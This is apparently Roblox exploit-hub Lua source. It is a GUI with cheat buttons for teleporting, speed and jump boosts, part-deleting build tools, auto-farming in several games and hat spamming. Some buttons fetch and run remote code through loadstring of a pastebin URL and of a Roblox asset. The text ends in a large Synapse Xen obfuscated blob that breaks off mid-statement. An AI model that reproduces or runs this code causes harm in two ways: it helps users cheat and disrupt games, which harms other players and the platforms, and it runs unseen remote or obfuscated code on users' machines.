Enum.Font.Cartoon MoreSoon.Text = "More soon..." MoreSoon.TextColor3 = Color3.new(0, 0, 0) MoreSoon.TextScaled = true MoreSoon.TextSize = 14 MoreSoon.TextWrapped = true ChocolateCastle.Name = "Chocolate Castle" ChocolateCastle.Parent = MainFrame ChocolateCastle.BackgroundColor3 = Color3.new(0.831373, 0, 0) ChocolateCastle.BorderColor3 = Color3.new(0.45098, 0, 0) ChocolateCastle.BorderSizePixel = 2 ChocolateCastle.Position = UDim2.new(0.347025067, 0, 0.791653872, 0) ChocolateCastle.Size = UDim2.new(0, 150, 0, 39) ChocolateCastle.Font = Enum.Font.Cartoon ChocolateCastle.Text = "Chocolate Castle" ChocolateCastle.TextColor3 = Color3.new(0, 0, 0) ChocolateCastle.TextScaled = true ChocolateCastle.TextSize = 14 ChocolateCastle.TextWrapped = true LocalScripts.Name = "Local Scripts" LocalScripts.Parent = GUI LocalScripts.Active = true LocalScripts.BackgroundColor3 = Color3.new(0.219608, 0.219608, 0.219608) LocalScripts.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) LocalScripts.BorderSizePixel = 4 LocalScripts.Position = UDim2.new(0.843137264, 0, 0.0718144625, 0) LocalScripts.Size = UDim2.new(0, 85, 0, 258) Btools.Name = "Btools" Btools.Parent = LocalScripts Btools.BackgroundColor3 = Color3.new(0.831373, 0, 0) Btools.BorderColor3 = Color3.new(0.45098, 0, 0) Btools.BorderSizePixel = 2 Btools.Position = UDim2.new(0.0833330974, 0, 0.0474677868, 0) Btools.Size = UDim2.new(0, 69, 0, 38) Btools.Font = Enum.Font.Cartoon Btools.Text = "Btools" Btools.TextColor3 = Color3.new(0, 0, 0) Btools.TextScaled = true Btools.TextSize = 14 Btools.TextWrapped = true Walkspeed.Name = "Walk speed" Walkspeed.Parent = LocalScripts Walkspeed.BackgroundColor3 = Color3.new(0.831373, 0, 0) Walkspeed.BorderColor3 = Color3.new(0.45098, 0, 0) Walkspeed.BorderSizePixel = 2 Walkspeed.Position = UDim2.new(0.0833330974, 0, 0.237390265, 0) Walkspeed.Size = UDim2.new(0, 69, 0, 38) Walkspeed.Font = Enum.Font.Cartoon Walkspeed.Text = "Walkspeed" Walkspeed.TextColor3 = Color3.new(0, 0, 0) Walkspeed.TextScaled = true Walkspeed.TextSize = 14 Walkspeed.TextWrapped = true Jumppower.Name = "Jump power" Jumppower.Parent = LocalScripts Jumppower.BackgroundColor3 = Color3.new(0.831373, 0, 0) Jumppower.BorderColor3 = Color3.new(0.45098, 0, 0) Jumppower.BorderSizePixel = 2 Jumppower.Position = UDim2.new(0.0833330974, 0, 0.431188703, 0) Jumppower.Size = UDim2.new(0, 69, 0, 38) Jumppower.Font = Enum.Font.Cartoon Jumppower.Text = "Jump power" Jumppower.TextColor3 = Color3.new(0, 0, 0) Jumppower.TextScaled = true Jumppower.TextSize = 14 Jumppower.TextWrapped = true NormalJpWs.Name = "NormalJp&Ws" NormalJpWs.Parent = LocalScripts NormalJpWs.BackgroundColor3 = Color3.new(0.831373, 0, 0) NormalJpWs.BorderColor3 = Color3.new(0.45098, 0, 0) NormalJpWs.BorderSizePixel = 2 NormalJpWs.Position = UDim2.new(0.0833330974, 0, 0.617235184, 0) NormalJpWs.Size = UDim2.new(0, 69, 0, 38) NormalJpWs.Font = Enum.Font.Cartoon NormalJpWs.Text = "Normal Jp & Ws" NormalJpWs.TextColor3 = Color3.new(0, 0, 0) NormalJpWs.TextScaled = true NormalJpWs.TextSize = 14 NormalJpWs.TextWrapped = true Moresoon2.Name = "Moresoon2" Moresoon2.Parent = LocalScripts Moresoon2.BackgroundColor3 = Color3.new(0.831373, 0, 0) Moresoon2.BorderColor3 = Color3.new(0.45098, 0, 0) Moresoon2.BorderSizePixel = 2 Moresoon2.Position = UDim2.new(0.0833330974, 0, 0.791653752, 0) Moresoon2.Size = UDim2.new(0, 69, 0, 38) Moresoon2.Font = Enum.Font.Cartoon Moresoon2.Text = "More soon..." Moresoon2.TextColor3 = Color3.new(0, 0, 0) Moresoon2.TextScaled = true Moresoon2.TextSize = 14 Moresoon2.TextWrapped = true -- Scripts: function SCRIPT_CIIA66_FAKESCRIPT() -- FuckLickSimByDelvy.LocalScript getfenv().script = Instance.new('LocalScript', FuckLickSimByDelvy) local GUI = script.Parent.GUI script.Parent.Frame1.Open.MouseButton1Click:Connect(function() GUI:TweenPosition(UDim2.new(0.26, 0,0.226, 0), 'Out','Bounce',2) end) script.Parent.GUI.UpFrame.X.MouseButton1Click:Connect(function() GUI:TweenPosition(UDim2.new(-1, 0,0.226, 0), 'Out', 'Bounce',2) end) end coroutine.resume(coroutine.create(SCRIPT_CIIA66_FAKESCRIPT)) function SCRIPT_VBSA72_FAKESCRIPT() -- CookieObby.2 getfenv().script = Instance.new('LocalScript', CookieObby) local CookieObby = game:GetService("Workspace").Obby['Cookie Obby'].Chest.Effect.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CookieObby end end end coroutine.resume(coroutine.create(SCRIPT_VBSA72_FAKESCRIPT)) function SCRIPT_LQJB87_FAKESCRIPT() -- ToyObby.10 getfenv().script = Instance.new('LocalScript', ToyObby) local ToyObby = game:GetService("Workspace").Obby['Toy Obby'].Chest.Effect.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = ToyObby end end end coroutine.resume(coroutine.create(SCRIPT_LQJB87_FAKESCRIPT)) function SCRIPT_VTWE82_FAKESCRIPT() -- JungleObby.4 getfenv().script = Instance.new('LocalScript', JungleObby) local JungleObby = game:GetService("Workspace").Obby['Jungle Obby'].Chest.Effect.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = JungleObby end end end coroutine.resume(coroutine.create(SCRIPT_VTWE82_FAKESCRIPT)) function SCRIPT_XZGJ67_FAKESCRIPT() -- MidnightObby.5 getfenv().script = Instance.new('LocalScript', MidnightObby) local MidnightObby = game:GetService("Workspace").Obby['Midnight Obby'].Chest.Effect.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = MidnightObby end end end coroutine.resume(coroutine.create(SCRIPT_XZGJ67_FAKESCRIPT)) function SCRIPT_BNIJ75_FAKESCRIPT() -- SlimeObby.8 getfenv().script = Instance.new('LocalScript', SlimeObby) local SlimeObby = game:GetService("Workspace").Obby['Slime Obby'].Chest.Effect.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = SlimeObby end end end coroutine.resume(coroutine.create(SCRIPT_BNIJ75_FAKESCRIPT)) function SCRIPT_JPIM79_FAKESCRIPT() -- MischiefObby.6 getfenv().script = Instance.new('LocalScript', MischiefObby) local MischiefObby = game:GetService("Workspace").Obby['Mischief Obby'].Chest.Effect.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = MischiefObby end end end coroutine.resume(coroutine.create(SCRIPT_JPIM79_FAKESCRIPT)) function SCRIPT_KVYT82_FAKESCRIPT() -- DoomObby.3 getfenv().script = Instance.new('LocalScript', DoomObby) local DoomObby = game:GetService("Workspace").Obby['Doom Obby'].Chest.Effect.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = DoomObby end end end coroutine.resume(coroutine.create(SCRIPT_KVYT82_FAKESCRIPT)) function SCRIPT_FKJE90_FAKESCRIPT() -- VIPZone.11 getfenv().script = Instance.new('LocalScript', VIPZone) local VIP = CFrame.new(-2, 7, 911) script.Parent.MouseButton1Click:Connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = VIP end) end coroutine.resume(coroutine.create(SCRIPT_FKJE90_FAKESCRIPT)) function SCRIPT_ZMNZ90_FAKESCRIPT() -- Skyland.7 getfenv().script = Instance.new('LocalScript', Skyland) local SkyIsland = CFrame.new(-2, 2200, -61) script.Parent.MouseButton1Click:Connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = SkyIsland end) end coroutine.resume(coroutine.create(SCRIPT_ZMNZ90_FAKESCRIPT)) function SCRIPT_MKIC65_FAKESCRIPT() -- Tokens.9 getfenv().script = Instance.new('LocalScript', Tokens) local tokens = workspace['Main Area'].Tokens.Token.CFrame local gems = workspace['Main Area'].Gems.Gem.CFrame local Skyislandtokens = game:GetService("Workspace").Skyland.AirTokens.Token.CFrame local plrCFrame = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame local BoolValue = false function Click(mouse) if BoolValue == false then BoolValue = true else BoolValue = false end end script.Parent.MouseButton1Down:connect(Click) wait () while true do wait () if BoolValue == true then wait() tokens = plrCFrame gems = plrCFrame Skyislandtokens = plrCFrame end end end coroutine.resume(coroutine.create(SCRIPT_MKIC65_FAKESCRIPT)) function SCRIPT_SCGJ66_FAKESCRIPT() -- ChocolateCastle.1 getfenv().script = Instance.new('LocalScript', ChocolateCastle) local ChocoCastle = workspace['Choco Castle']['Fat Prince'].Torso.CFrame script.Parent.MouseButton1Click:Connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = ChocoCastle end) end coroutine.resume(coroutine.create(SCRIPT_SCGJ66_FAKESCRIPT)) function SCRIPT_HJZG75_FAKESCRIPT() -- Btools.Btools getfenv().script = Instance.new('LocalScript', Btools) script.Parent.MouseButton1Click:Connect(function(click) local a=Instance.new("Tool")a.RequiresHandle=false;a.Name="Delete"local b=game:GetService("Players").LocalPlayer;a.Parent=b:WaitForChild("Backpack")local c=b:GetMouse()local d=false;local e=Instance.new("SelectionBox")e.Color3=Color3.new(0,0.6,0.6,6)e.Parent=b.PlayerGui;local c=b:GetMouse()local e=Instance.new("SelectionBox")e.Color3=Color3.new(0,0.6,0.6,6)e.Parent=b.PlayerGui;e.Name="derp"c.Move:connect(function()if d then local f=c.Target;if not f then e.Adornee=nil else if f:IsA("BasePart")then e.Adornee=f else e.Adornee=nil end end end end)a.Equipped:Connect(function()d=true end)a.Unequipped:Connect(function()e.Adornee=nil;d=false end)a.Activated:Connect(function()if e.Adornee then local g=Instance.new("Explosion")g.Parent=game:GetService("Workspace");g.Position=e.Adornee.Position;g.BlastPressure=0;local h=Instance.new("Sound")h.SoundId="http://www.roblox.com/asset/?id=315775189"h.Parent=game:GetService("Workspace");h:Play()e.Adornee:Destroy()e.Adornee=nil end end) function unlockEverything(a) for n,o in pairs(a:GetChildren())do if(o:IsA("BasePart"))then o.Locked = false end unlockEverything(o) end end unlockEverything(Workspace) end) end coroutine.resume(coroutine.create(SCRIPT_HJZG75_FAKESCRIPT)) function SCRIPT_JZVQ79_FAKESCRIPT() -- Walkspeed.Walkspeed getfenv().script = Instance.new('LocalScript', Walkspeed) script.Parent.MouseButton1Click:Connect(function(click) game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 100 end) end coroutine.resume(coroutine.create(SCRIPT_JZVQ79_FAKESCRIPT)) function SCRIPT_ATJI68_FAKESCRIPT() -- Jumppower.Jumppower getfenv().script = Instance.new('LocalScript', Jumppower) script.Parent.MouseButton1Click:Connect(function(click) game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = 150 end) end coroutine.resume(coroutine.create(SCRIPT_ATJI68_FAKESCRIPT)) function SCRIPT_ULOQ84_FAKESCRIPT() -- NormalJpWs.Jumppower getfenv().script = Instance.new('LocalScript', NormalJpWs) script.Parent.MouseButton1Click:Connect(function(click) game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = 50 game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 16 end) end coroutine.resume(coroutine.create(SCRIPT_ULOQ84_FAKESCRIPT)) end) bubblegumsimulator.Name = "bubblegumsimulator" bubblegumsimulator.Parent = Main bubblegumsimulator.BackgroundColor3 = Color3.new(1, 1, 1) bubblegumsimulator.Position = UDim2.new(0.0158273429, 0, 0.785467148, 0) bubblegumsimulator.Size = UDim2.new(0, 200, 0, 25) bubblegumsimulator.Font = Enum.Font.SourceSans bubblegumsimulator.Text = "Bubble Gum Simulator" bubblegumsimulator.TextColor3 = Color3.new(0, 0, 0) bubblegumsimulator.TextSize = 25 bubblegumsimulator.MouseButton1Down:connect(function() while true do game["Run Service"].RenderStepped:wait() local Event = game:GetService("Players").LocalPlayer.BlowBubbleEvent Event:FireServer() end end) feguir15.Name = "feguir15" feguir15.Parent = Main feguir15.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) feguir15.Position = UDim2.new(0.634053767, 0, 0.319493264, 0) feguir15.Size = UDim2.new(0, 151, 0, 23) feguir15.Font = Enum.Font.SourceSans feguir15.Text = "FE GUI (R15)" feguir15.TextColor3 = Color3.new(0, 0, 0) feguir15.TextSize = 28 feguir15.MouseButton1Down:connect(function() -- Objects local FEGui = Instance.new("ScreenGui") local mainWindow = Instance.new("Frame") local Title = Instance.new("TextLabel") local CloseButton = Instance.new("TextButton") local PlayerName = Instance.new("TextBox") local Teleport = Instance.new("TextButton") local Invisible = Instance.new("TextButton") local Cut = Instance.new("TextButton") local Drop = Instance.new("TextButton") -- Properties FEGui.Name = "FE Gui" FEGui.Parent = game:GetService("CoreGui") mainWindow.Name = "mainWindow" mainWindow.Parent = FEGui mainWindow.BackgroundColor3 = Color3.new(0.380392, 0.380392, 0.380392) mainWindow.BackgroundTransparency = 0.34999999403954 mainWindow.BorderSizePixel = 0 mainWindow.Position = UDim2.new(0, 0, 0, 290) mainWindow.Size = UDim2.new(0, 281, 0, 148) Title.Name = "Title" Title.Parent = FEGui Title.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) Title.BackgroundTransparency = 0.34999999403954 Title.BorderSizePixel = 0 Title.Position = UDim2.new(0, 0, 0, 290) Title.Size = UDim2.new(0, 245, 0, 21) Title.Font = Enum.Font.SourceSans Title.FontSize = Enum.FontSize.Size18 Title.Text = " FE Gui By Phemzyx" Title.TextColor3 = Color3.new(1, 1, 1) Title.TextSize = 18 Title.TextXAlignment = Enum.TextXAlignment.Left CloseButton.Name = "CloseButton" CloseButton.Parent = FEGui CloseButton.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) CloseButton.BackgroundTransparency = 0.34999999403954 CloseButton.BorderSizePixel = 0 CloseButton.Position = UDim2.new(0, 249, 0, 290) CloseButton.Size = UDim2.new(0, 32, 0, 21) CloseButton.FontSize = Enum.FontSize.Size14 CloseButton.Text = "X" CloseButton.TextColor3 = Color3.new(1, 0, 0) CloseButton.TextScaled = true CloseButton.TextSize = 14 CloseButton.TextStrokeTransparency = 0 CloseButton.TextWrapped = true PlayerName.Name = "PlayerName" PlayerName.Parent = FEGui PlayerName.BackgroundColor3 = Color3.new(0.709804, 0.709804, 0.709804) PlayerName.BackgroundTransparency = 0.60000002384186 PlayerName.BorderSizePixel = 0 PlayerName.Position = UDim2.new(0, 5, 0, 320) PlayerName.Size = UDim2.new(0, 199, 0, 19) PlayerName.Font = Enum.Font.SourceSans PlayerName.FontSize = Enum.FontSize.Size14 PlayerName.Text = "" PlayerName.TextSize = 14 PlayerName.TextColor3 = Color3.new(1, 1, 1) PlayerName.PlaceholderText = "PlayerName" PlayerName.PlaceholderColor3 = Color3.new(1, 1, 1) Teleport.Name = "Teleport" Teleport.Parent = FEGui Teleport.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) Teleport.BackgroundTransparency = 0.34999999403954 Teleport.BorderSizePixel = 0 Teleport.Position = UDim2.new(0, 210, 0, 320) Teleport.Size = UDim2.new(0, 64, 0, 19) Teleport.FontSize = Enum.FontSize.Size10 Teleport.Text = "tp to" Teleport.TextColor3 = Color3.new(1, 1, 1) Teleport.TextSize = 10 Teleport.TextWrapped = true Invisible.Name = "Invisible" Invisible.Parent = FEGui Invisible.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) Invisible.BackgroundTransparency = 0.34999999403954 Invisible.BorderSizePixel = 0 Invisible.Position = UDim2.new(0, 5, 0, 345) Invisible.Size = UDim2.new(0, 269, 0, 27) Invisible.FontSize = Enum.FontSize.Size14 Invisible.Text = "Invisible" Invisible.TextColor3 = Color3.new(1, 1, 1) Invisible.TextSize = 13 Invisible.TextStrokeTransparency = 0.58999997377396 Invisible.TextWrapped = true Cut.Name = "Cut" Cut.Parent = FEGui Cut.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) Cut.BackgroundTransparency = 0.34999999403954 Cut.BorderSizePixel = 0 Cut.Position = UDim2.new(0, 5, 0, 375) Cut.Size = UDim2.new(0, 269, 0, 27) Cut.FontSize = Enum.FontSize.Size14 Cut.Text = "Cut yourself in half" Cut.TextColor3 = Color3.new(1, 1, 1) Cut.TextSize = 13 Cut.TextStrokeTransparency = 0.58999997377396 Cut.TextWrapped = true Drop.Name = "Drop" Drop.Parent = FEGui Drop.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) Drop.BackgroundTransparency = 0.34999999403954 Drop.BorderSizePixel = 0 Drop.Position = UDim2.new(0, 5, 0, 405) Drop.Size = UDim2.new(0, 269, 0, 27) Drop.FontSize = Enum.FontSize.Size14 Drop.Text = "Spam Hats" Drop.TextColor3 = Color3.new(1, 1, 1) Drop.TextSize = 13 Drop.TextStrokeTransparency = 0.58999997377396 Drop.TextWrapped = true --Functions Drop.MouseButton1Click:connect(function() while true do local j=game:GetService("Players").LocalPlayer for k,l in pairs(j.Character:GetChildren())do if l:IsA'Accoutrement'then l.Parent=game:GetService("Workspace") end end wait(0.1) plr = game:GetService("Players").LocalPlayer pcall(function() local Pos = plr.Character:GetPrimaryPartCFrame() plr:LoadCharacter() plr.Character:SetPrimaryPartCFrame(Pos) if plr.Character:FindFirstChild("ForceField") then wait(0.2) -- the Number "(0.2)" its the time to Make The Forcefield Being Removed. plr.Character["ForceField"]:Destroy() end end) wait(3) end end) Cut.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.UpperTorso.Waist:Destroy() end) Invisible.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.LowerTorso.Root:Destroy() end) CloseButton.MouseButton1Click:connect(function() FEGui:Destroy() end) Teleport.MouseButton1Click:connect(function() local me = game:GetService("Players").LocalPlayer.Name game:GetService("Workspace")[me].HumanoidRootPart.CFrame = CFrame.new(game:GetService("Players")[PlayerName.Text].Character.Head.Position) end) end) IYFE.Name = "IYFE" IYFE.Parent = Main IYFE.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) IYFE.Position = UDim2.new(0.634053767, 0, 0.422829658, 0) IYFE.Size = UDim2.new(0, 152, 0, 21) IYFE.Font = Enum.Font.SourceSans IYFE.Text = "IY FE" IYFE.TextColor3 = Color3.new(0, 0, 0) IYFE.TextSize = 28 IYFE.MouseButton1Down:connect(function() loadstring(game:HttpGet(('https://pastebin.com/raw/tzTXmYf2'),true))() end) feguihastebin.Name = "feguihastebin" feguihastebin.Parent = Main feguihastebin.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) feguihastebin.Position = UDim2.new(0.635492623, 0, 0.514394343, 0) feguihastebin.Size = UDim2.new(0, 151, 0, 21) feguihastebin.Font = Enum.Font.SourceSans feguihastebin.Text = "FE GUI" feguihastebin.TextColor3 = Color3.new(0, 0, 0) feguihastebin.TextSize = 28 feguihastebin.MouseButton1Down:connect(function() loadstring(game:GetObjects('rbxassetidUndecided/718389580')[1].Source)() end) slayingsimulator.Name = "slayingsimulator" slayingsimulator.Parent = Main slayingsimulator.BackgroundColor3 = Color3.new(1, 1, 1) slayingsimulator.Position = UDim2.new(0.0158273429, 0, 0.56055361, 0) slayingsimulator.Size = UDim2.new(0, 200, 0, 25) slayingsimulator.Font = Enum.Font.SourceSans slayingsimulator.Text = "Slaying Simulator" slayingsimulator.TextColor3 = Color3.new(0, 0, 0) slayingsimulator.TextSize = 25 slayingsimulator.MouseButton1Down:connect(function() local p = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart _G.toggled = true while _G.toggled == true do for i, v in pairs(game:GetService("Workspace").Enemies.Assassins:GetChildren()) do v:FindFirstChild("HumanoidRootPart").Anchored = true v:FindFirstChild("HumanoidRootPart").CFrame = CFrame.new(-84, 3.5, 15) p.CFrame = CFrame.new(-84, 4, 16.8) wait() end end game:GetService("Players").LocalPlayer.PlayerGui.MainGui.AcceptQuest.Visible = true end) Close.Name = "Close" Close.Parent = Main Close.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216) Close.BorderSizePixel = 0 Close.Position = UDim2.new(0.93230176, 0, 0, 0) Close.Size = UDim2.new(0, 47, 0, 26) Close.Font = Enum.Font.SourceSans Close.Text = "X" Close.TextColor3 = Color3.new(1, 1, 1) Close.TextSize = 30 Close.MouseButton1Down:connect(function() OpenFrame.Visible = true Main.Visible = false end) others.Name = "others" others.Parent = Main others.BackgroundColor3 = Color3.new(0, 0, 0) others.Position = UDim2.new(0, 0, 0.128027678, 0) others.Size = UDim2.new(0, 311, 0, 24) others.Font = Enum.Font.SourceSans others.Text = "GAMES" others.TextColor3 = Color3.new(1, 1, 1) others.TextSize = 40 hubs.Name = "hubs" hubs.Parent = Main hubs.BackgroundColor3 = Color3.new(0, 0, 0) hubs.Position = UDim2.new(0.448598027, 0, 0.128027678, 0) hubs.Size = UDim2.new(0, 383, 0, 24) hubs.Font = Enum.Font.SourceSans hubs.Text = "HUBS" hubs.TextColor3 = Color3.new(1, 1, 1) hubs.TextSize = 40 TextLabel_2.Parent = Main TextLabel_2.BackgroundColor3 = Color3.new(0, 0, 0) TextLabel_2.Position = UDim2.new(0.592805743, 0, 0, 0) TextLabel_2.Size = UDim2.new(0, 200, 0, 26) TextLabel_2.Font = Enum.Font.SourceSans TextLabel_2.Text = "Version: 3.0" TextLabel_2.TextColor3 = Color3.new(1, 1, 1) TextLabel_2.TextSize = 30 onepiecemillenium.Name = "onepiecemillenium" onepiecemillenium.Parent = Main onepiecemillenium.BackgroundColor3 = Color3.new(1, 1, 1) onepiecemillenium.Position = UDim2.new(0.0158273429, 0, 0.235294119, 0) onepiecemillenium.Size = UDim2.new(0, 200, 0, 25) onepiecemillenium.Font = Enum.Font.SourceSans onepiecemillenium.Text = "One Piece Millenium" onepiecemillenium.TextColor3 = Color3.new(0, 0, 0) onepiecemillenium.TextSize = 25 onepiecemillenium.MouseButton1Down:connect(function() --[[ Synapse Xen v1.1.1 by Synapse GP VM Hash: f69258865641fcfc8b11c8c2ba185e3d2f07f9aea1a8685bd21508d70102c7d2 ]] local SynapseXen_lIIiIiiiIl=select;local SynapseXen_iIiilll=string.byte;local SynapseXen_lliIIiIlllIiIl=string.sub;local SynapseXen_iIilIliilIIIliIIiIil=string.char;local SynapseXen_llIlIlIlIIIilIIlilii=type;local SynapseXen_illIIIIII=table.concat;local unpack=unpack;local setmetatable=setmetatable;local pcall=pcall;local SynapseXen_lIIiIIiIilIIIl,SynapseXen_iIlIiIlIil,SynapseXen_illIiillliIIIill,SynapseXen_IilIlIiIl;if bit and bit.bxor then SynapseXen_lIIiIIiIilIIIl=bit.bxor;SynapseXen_iIlIiIlIil=function(SynapseXen_iiIIIiiiI,SynapseXen_liiIiIiIIliIiiI)local SynapseXen_IlIIlliIIiiliIilll=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iiIIIiiiI,SynapseXen_liiIiIiIIliIiiI)if SynapseXen_IlIIlliIIiiliIilll<0 then SynapseXen_IlIIlliIIiiliIilll=4294967296+SynapseXen_IlIIlliIIiiliIilll end;return SynapseXen_IlIIlliIIiiliIilll end else SynapseXen_lIIiIIiIilIIIl=function(SynapseXen_iiIIIiiiI,SynapseXen_liiIiIiIIliIiiI)local SynapseXen_ililiIlIlIiII=function(SynapseXen_IilIlIllilIIillIIIIi,SynapseXen_ilIIIlIiIIiiII)return SynapseXen_IilIlIllilIIillIIIIi%(SynapseXen_ilIIIlIiIIiiII*2)>=SynapseXen_ilIIIlIiIIiiII end;local SynapseXen_IIlillilIllliiiiI=0;for SynapseXen_ilIIiiIilllliliIIil=0,31 do SynapseXen_IIlillilIllliiiiI=SynapseXen_IIlillilIllliiiiI+(SynapseXen_ililiIlIlIiII(SynapseXen_iiIIIiiiI,2^SynapseXen_ilIIiiIilllliliIIil)~=SynapseXen_ililiIlIlIiII(SynapseXen_liiIiIiIIliIiiI,2^SynapseXen_ilIIiiIilllliliIIil)and 2^SynapseXen_ilIIiiIilllliliIIil or 0)end;return SynapseXen_IIlillilIllliiiiI end;SynapseXen_iIlIiIlIil=SynapseXen_lIIiIIiIilIIIl end;SynapseXen_illIiillliIIIill=function(SynapseXen_iliiIlill,SynapseXen_liiIIiililllIi,SynapseXen_ilIlIiIliiiiIiI)return(SynapseXen_iliiIlill+SynapseXen_liiIIiililllIi)%SynapseXen_ilIlIiIliiiiIiI end;SynapseXen_IilIlIiIl=function(SynapseXen_iliiIlill,SynapseXen_liiIIiililllIi,SynapseXen_ilIlIiIliiiiIiI)return(SynapseXen_iliiIlill-SynapseXen_liiIIiililllIi)%SynapseXen_ilIlIiIliiiiIiI end;local function SynapseXen_iillIlIiiiiIi(SynapseXen_IlIIlliIIiiliIilll)if SynapseXen_IlIIlliIIiiliIilll<0 then SynapseXen_IlIIlliIIiiliIilll=4294967296+SynapseXen_IlIIlliIIiiliIilll end;return SynapseXen_IlIIlliIIiiliIilll end;local getfenv=getfenv;if not getfenv then getfenv=function()return _ENV end end;local SynapseXen_iIIIIiiIll={}local SynapseXen_llIIllllIlI={}local SynapseXen_illIIIIlilIIiIIlii;local SynapseXen_IliiIilii;local SynapseXen_lIiliiIIilIiIIIiIIiI={}local SynapseXen_lIlIlIllll={}for SynapseXen_ilIIiiIilllliliIIil=0,255 do local SynapseXen_IIiIilI,SynapseXen_liiiIiIii=SynapseXen_iIilIliilIIIliIIiIil(SynapseXen_ilIIiiIilllliliIIil),SynapseXen_iIilIliilIIIliIIiIil(SynapseXen_ilIIiiIilllliliIIil,0)SynapseXen_lIiliiIIilIiIIIiIIiI[SynapseXen_IIiIilI]=SynapseXen_liiiIiIii;SynapseXen_lIlIlIllll[SynapseXen_liiiIiIii]=SynapseXen_IIiIilI end;local function SynapseXen_llIiiiiiIlI(SynapseXen_lliIlIiilIilI,SynapseXen_iiilii,SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii)if SynapseXen_iIIlilIliliilii>=256 then SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii=0,SynapseXen_IlIIliiIiililii+1;if SynapseXen_IlIIliiIiililii>=256 then SynapseXen_iiilii={}SynapseXen_IlIIliiIiililii=1 end end;SynapseXen_iiilii[SynapseXen_iIilIliilIIIliIIiIil(SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii)]=SynapseXen_lliIlIiilIilI;SynapseXen_iIIlilIliliilii=SynapseXen_iIIlilIliliilii+1;return SynapseXen_iiilii,SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii end;local function SynapseXen_iIlllI(SynapseXen_iilllIIliiIiI)local function SynapseXen_iIliliIiliiii(SynapseXen_IIiIIl)local SynapseXen_IlIIliiIiililii='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'SynapseXen_IIiIIl=string.gsub(SynapseXen_IIiIIl,'[^'..SynapseXen_IlIIliiIiililii..'=]','')return SynapseXen_IIiIIl:gsub('.',function(SynapseXen_iliiIlill)if SynapseXen_iliiIlill=='='then return''end;local SynapseXen_IIIliIIiiIll,SynapseXen_IlllliIllIIlilIIii='',SynapseXen_IlIIliiIiililii:find(SynapseXen_iliiIlill)-1;for SynapseXen_ilIIiiIilllliliIIil=6,1,-1 do SynapseXen_IIIliIIiiIll=SynapseXen_IIIliIIiiIll..(SynapseXen_IlllliIllIIlilIIii%2^SynapseXen_ilIIiiIilllliliIIil-SynapseXen_IlllliIllIIlilIIii%2^(SynapseXen_ilIIiiIilllliliIIil-1)>0 and'1'or'0')end;return SynapseXen_IIIliIIiiIll end):gsub('%d%d%d?%d?%d?%d?%d?%d?',function(SynapseXen_iliiIlill)if#SynapseXen_iliiIlill~=8 then return''end;local SynapseXen_iIlilII=0;for SynapseXen_ilIIiiIilllliliIIil=1,8 do SynapseXen_iIlilII=SynapseXen_iIlilII+(SynapseXen_iliiIlill:sub(SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIiiIilllliliIIil)=='1'and 2^(8-SynapseXen_ilIIiiIilllliliIIil)or 0)end;return string.char(SynapseXen_iIlilII)end)end;SynapseXen_iilllIIliiIiI=SynapseXen_iIliliIiliiii(SynapseXen_iilllIIliiIiI)local 